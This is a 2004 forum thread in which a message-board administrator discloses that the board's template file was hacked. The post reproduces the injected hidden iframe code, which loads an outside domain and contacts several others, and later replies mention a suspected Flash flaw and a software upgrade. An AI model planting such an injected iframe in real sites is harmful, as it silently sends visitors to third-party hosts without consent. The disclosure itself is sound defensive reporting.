AntiPolygraph.org Message Board

(UTC)

Welcome, Guest. Please Login or Register

News:

You can enhance your privacy when browsing and posting to this forum by using the free and open source Tor Browser and posting as a guest (using a fake e-mail address such as nobody@nowhere.com) or registering with a free, anonymous ProtonMail e-mail account. Registered users can exchange private messages with other registered users and receive notifications.

In addition, check out our live chat server.

AntiPolygraph.org Message Board › Polygraph and CVSA Forums › Action Alerts and Announcements › Add Poll ( Re: AntiPolygraph.org Message Board Hacked )

Topic Summary - Displaying 4 post(s).

Posted by: Administrator Posted on: Sep 23^rd, 2004 at 9:05am	Mark & Quote Quote
No, it is not clear how the template file was modified, though it may have been through a security flaw involving Macromedia Flash files. We disabled flash. In addition, if you are running YaBB, you can upgrade to version 1.3.2, which includes security fixes.

Posted by: macagent Posted on: Sep 23^rd, 2004 at 5:02am	Mark & Quote Quote
I have seen this exact same thing happen to my site. Did you ever find out what happened and how to prevent it?

Posted by: Administrator Posted on: Jun 6^th, 2004 at 4:17am	Mark & Quote Quote
Similar hacking incidents have been reported on other websites. See: http://forums.hostreflex.com/showthread.php?p=1029#post1029 http://forums.eqdkp.com/index.php?showtopic=885

Posted by: Administrator
Posted on: Jun 6^th, 2004 at 3:47am

Mark & Quote

On 2 June 2004 at 11:28 hrs Pacific Daylight Time, the AntiPolygraph.org message board's template file was modified without authorization by an unknown person. The following text was inserted into the file:

<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://re6.net/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div>

This code would cause a number of outside URLs to be contacted each time any page on the message board was loaded. Its intended purpose seems to be to deliver pop-up advertisements. Among the URLs that would automatically be contacted are:

http://re6.net/?s=1
http://sowor.ru
http://wall.sowor.ru/?tfnop=mgetx

The added code was removed on 5 June 2004 at 17:07 hrs PDT. We are researching this incident and taking measures to prevent a re-occurrence.

Question:

Options:	Text	Color	Split Pie
Option 1:
Option 2:
Option 3:
Option 4:
Option 5:
Option 6:
Option 7:
Option 8:

Automatic End in:	days and minutes. Leave it blank if you don't want to set it now.
Enable Guest Voting:	Check this if you want guests to be able to vote in this poll.
Hide results:	Check this if you do not want the results of this poll shown until voting has been closed.
Multiple Choice	Check this if you want to allow users to vote for more than one option.
Time limit for deleting vote:	Time in minutes users are allowed to delete their vote (0 to disable delete).
Use legends for Pie Chart	Check this to use legends instead of labels next to each pie slice.
Pie Chart Radius:	Must be a value between 100 and 200 (default 100)

Name:
E-mail:
Your Verification Code is:	Please type the characters that appear in the image. The characters must be typed in the same order, and they are case-sensitive.
Verification Code:
Preview